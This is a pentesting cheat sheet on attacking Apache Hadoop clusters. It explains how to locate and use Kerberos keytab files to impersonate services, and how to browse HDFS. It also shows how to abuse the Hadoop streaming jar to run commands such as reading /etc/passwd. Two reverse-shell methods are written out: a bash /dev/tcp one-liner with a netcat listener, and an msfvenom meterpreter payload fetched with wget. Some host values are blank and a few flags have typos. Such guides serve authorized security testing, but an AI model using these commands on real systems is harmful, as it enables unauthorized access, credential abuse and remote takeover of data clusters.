Apache Hadoop Pentesting

Last modified: 2023-04-02


Apache Hadoop is a collection of open-source software utilities that facilitates using a network of many computers to solve problems involving massive amounts of data and computation. It uses ports 8020, 9000, 50010, 50020, 50070, 50075, 50475 by default.

Authenticate using Keytab

Kyetab files are used to authenticate to the KDC (key distribution center) on Kerberos authentication. To find them, execute the following command in target system.

find / -type f -name *.keytab 2>/dev/null

After finding them, we can use them to gather information or authenticate.

# Gather information from a keytab
# -k: Speicifed a keytab file
klist -k /path/to/example.keytab

# Authenticate to Kerberos server and request a ticket.
# <principal_name>: it' stored in example.keytab. Run `klist -k example.keytab` to check it.
# -k: Use a keytab
# -V: verbose mode
# -t <keytab_file>: Filename of keytab to use
kinit <principal_name> -k -V -t /path/to/example.keytab
# e.g.
kinit user/hadoop.docker.com@EXAMPLE.COM -k -V -t /path/to/example.keytab

Impersonate Another Hadoop Service

We can authenticate other services by executing klist and kinit. Then we can investigate the HDFS service by the following HDFS commands.

HDFS Commands

Find HDFS Binary Path

When authenticated, we need to find the path of the hdfs command associated with Hadoop. This command allows us to execute file system command in the datalake.
If the path exists in the default PATH (confirm to run echo $PATH), we don't have to find them. However, if the path is not set in the default PATH, find it by running the following command.

find / -type f -name hdfs 2>/dev/null

If we find the path, go to the directory and use commands as below.

HDFS Command Cheat Sheet

Please refer to https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/HDFSCommands.html#Overview

As mentioned above, if the hdfs path is not set in the PATH, we need to go to where the hdfs binary exists.
Basically, their commands are similar to UNIX.

hdfs dfs -help

# List files in the hdfs service root.
hdfs dfs -ls /
# -R: Recursive
hdfs dfs -ls /R /
# Get the contents of the file
hdfs dfs -cat /example.txt

RCE (Remote Code Execution)

Reference: https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools Techniques and Procedures/Executing remote commands

First we need to create arbitrary file that contains at lease one character. Then put it on HDFS.

echo hello > /tmp/hello.txt
hdfs dfs -put /tmp/hello.txt /tmp/hello.txt

Now execute below command to execute remote command.
Note that the -output directory needs to be NOT exist, so if we want to multiple execute command, we have to delete the previous output folder or specify another name.

hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "cat /etc/passwd" -reducer NONE

We can see the result of the command in the output directory. For example,

hdfs dfs -ls /tmp/output
hdfs dfs -cat /tmp/output/part-00000

Reverse Shell

In target machine, create a reverse shell script and put it on HDFS.

echo '/bin/bash -i >& /dev/tcp/ 0>&1' > /tmp/shell.sh
hdfs dfs -put /tmp/shell.sh /tmp/shell.sh

In local machine, start a listener.

nc -lvnp 4444

Now execute the following command.

# -mapper: The HDFS path of the shell.elf
# -file: The system path of the shell.elf
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.sh" -reducer NONE -file "/tmp/shell.sh"  -background

We can get a shell in local machine.

Reverse Shell (MsfVenom)

First create a reverse shell payload using msfvenom in local machine and prepare a listener using msfconsole.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=4444 -f elf > shell.elf

msf> use exploit/multi/handler
msf> set payload linux/x86/meterpreter/reverse_tcp
msf> set lhost
msf> set lport 4444
msf> run

Transfer the payload to target machine.

wget -O /tmp/shell.elf
# Put it on HDFS.
hdfs dfs -put /tmp/shell.elf /tmp/shell.elf

Now execute the following command.

# -mapper: The HDFS path of the shell.elf
# -file: The system path of the shell.elf
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.elf" -reducer NONE -file "/tmp/shell.elf"  -background

We can get a shell in meterpreter so to spawn the OS shell, run shell command in the meterpreter.